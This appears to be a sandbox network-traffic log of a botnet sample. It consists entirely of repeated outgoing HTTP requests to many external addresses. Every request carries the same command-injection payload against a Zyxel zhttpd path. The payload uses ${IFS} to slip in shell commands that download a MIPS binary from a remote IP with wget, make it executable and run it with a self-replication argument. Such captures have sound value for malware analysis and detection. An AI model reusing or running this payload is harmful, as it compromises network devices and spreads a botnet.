                                                        Feb 2, 2024 06:20:55.629452944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.1457036114.31.12.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629487038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.1454462121.189.131.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629538059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.144716099.146.250.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629571915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.143429078.52.88.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629609108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.144221690.34.58.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629633904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.144798472.198.81.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629678011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.1442364165.105.90.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629697084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.1452920195.225.255.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629746914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.1444142133.233.165.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629776955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.145177892.108.201.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629816055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.1437702168.92.159.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629849911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.145830284.31.161.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629874945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.1455472168.105.68.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629903078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.1452258143.200.239.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629935980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.1457632119.122.113.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629995108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.1446190221.5.160.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630018950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.145004262.49.71.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630059004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.1437228220.14.181.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630099058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.1452594120.160.171.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630120993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.1458046174.19.175.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630176067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.1460094153.59.234.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630217075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.145254642.78.99.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630254984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.143684499.11.5.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630279064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.1455414151.105.26.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630333900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.1433266213.246.28.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630378008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.1449868126.120.112.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630414963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.145372820.78.238.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630455017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.1446888135.205.78.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630498886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.1453106103.60.33.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630527973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.1454596121.207.172.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630564928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.1445022146.236.134.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630613089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.1438618197.47.224.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630662918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.143797876.59.154.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630701065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.1446914173.108.244.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630750895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.145067639.218.3.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630799055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.143904268.131.140.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630824089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.144797836.109.127.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630878925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.1446530136.40.3.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630903006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.144070846.74.237.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630944967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.1446234205.1.213.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.630980015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.144624897.148.79.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631007910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.143710883.176.229.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631040096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.143857846.98.15.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631103992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.1439254103.234.21.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631129980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.14514941.13.195.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631159067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.143767095.95.142.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631200075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.1449384193.94.150.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631233931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.144192635.123.195.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631269932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.1441466188.35.5.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631313086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.1460724120.92.8.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631359100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.144780053.52.130.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631393909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.143362467.113.245.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631444931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.143699466.209.135.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631463051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.144509880.13.143.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631495953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.143424691.107.125.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631541967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.143419825.139.136.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631581068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.1442180167.153.69.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631609917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.1435538182.13.72.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631650925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.1447356197.87.188.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631685019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.1434776199.14.97.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631727934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.1450364171.220.230.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631762981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.1450584133.136.144.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.631798029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.1448586105.4.211.213443
                                                        TimestampBytes transferredDirectionData
